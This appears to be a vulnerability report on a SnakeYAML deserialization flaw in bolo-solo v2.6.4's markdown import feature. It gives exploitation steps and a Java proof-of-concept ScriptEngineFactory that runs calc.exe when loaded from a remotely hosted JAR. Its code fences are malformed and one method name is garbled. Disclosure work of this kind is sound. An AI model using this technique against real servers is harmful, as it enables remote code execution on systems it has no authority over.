### Vulnerability Key Information #### Vulnerability Description In the stable version bolo-solo v2.6.4, there is a deserialization vulnerability in the "import/markdown" path, caused by unsafe YAML loading. #### Vulnerable File - `src/main/java/org/b3log/solo/bolo/prop/BackupService.java` #### Vulnerability Details 1. **importMarkdo SendsSync() Method** - This method reads all `.md` files from the compressed package and retrieves article objects via the `parseArticle()` method. 2. **parseArticle() Method** - This method uses YAML to load the content of the read file, but does not use a secure loading approach, leading to a SnakeYAML deserialization vulnerability. 3. **POC (Proof of Concept)** - Create a JAR file that launches the local calculator. - Place the malicious JAR file on a web server and start a Python web server. - Example of a malicious Markdown file POC. #### Vulnerability Verification - After successfully triggering the vulnerability, the calculator pops up, indicating a successful attack. ```markdown #### POC Code ```java // Malicious ScriptEngineFactory class package artsplot; import javax.script.ScriptEngine; import javax.script.ScriptEngineFactory; import java.io.IOException; import java.util.List; public class AwesomeScriptEngineFactory implements ScriptEngineFactory { public AwesomeScriptEngineFactory() { try { Runtime.getRuntime().exec("calc.exe"); } catch (IOException e) { e.printStackTrace(); } } // Other methods return null } ``` ```markdown #### Exploitation Steps 1. Create a JAR file that launches the local calculator. 2. Place the malicious JAR file on a web server and start a Python web server. 3. Package a malicious Markdown document and upload it to the server, triggering the vulnerability via the `import/markdown` feature. ```markdown #### Summary - The deserialization vulnerability exists in the `import/markdown` path of bolo-solo v2.6.4. - The vulnerability stems from unsafe YAML loading. - Complete POC code and exploitation steps are provided.